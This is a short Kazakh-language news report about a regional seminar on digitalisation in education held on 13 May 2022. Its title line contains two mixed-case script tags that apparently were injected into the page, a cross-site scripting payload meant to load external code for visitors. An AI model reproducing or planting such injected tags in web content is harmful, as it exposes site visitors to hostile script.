Цифрландыру мәселелері бойынша семинар-кеңес<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.05.2022

Ақмола аймақтық білім берудегі жаңа технологиялар орталығының жұмыс жоспарына сәйкес 2022 жылғы 13 мамырда цифрландыру мәселелері бойынша "Білім беру жүйесіндегі цифрландырудың жаңа трендтері" тақырыбында жұмыс семинар-кеңесі өткізілді.

       Семинар-кеңеске цифрландыру мәселелеріне жетекшілік ететін әдіскерлер, үйлестірушілер және облыстық мамандандырылған мектеп-интернаттар қатысты.

       Кеңес барысында орталық директоры Б. Қадыров цифрландыру бойынша жүргізілген жұмыстар және жаңа оқу жылына арналған міндеттер туралы ақпарат берді:

- "Күнделік" бірыңғай интеграцияланған білім беру платформасын толтыру;

- ұлттық білім беру деректер базасы;

- білім беру ұйымдарының Интернет-ресурстары.

Орталықтың әдіскер-кеңесшісі М.Ибраев инклюзивті білім беру мәселелері бойынша сөз сөйледі.

Кеңес қорытындысы бойынша жоғарыда аталған мәселелердің міндеттері мен орындалу мерзімдері қойылды.

 

Просмотров: 8180


Пікір қосу



Деректерді қолтаңбаға қосу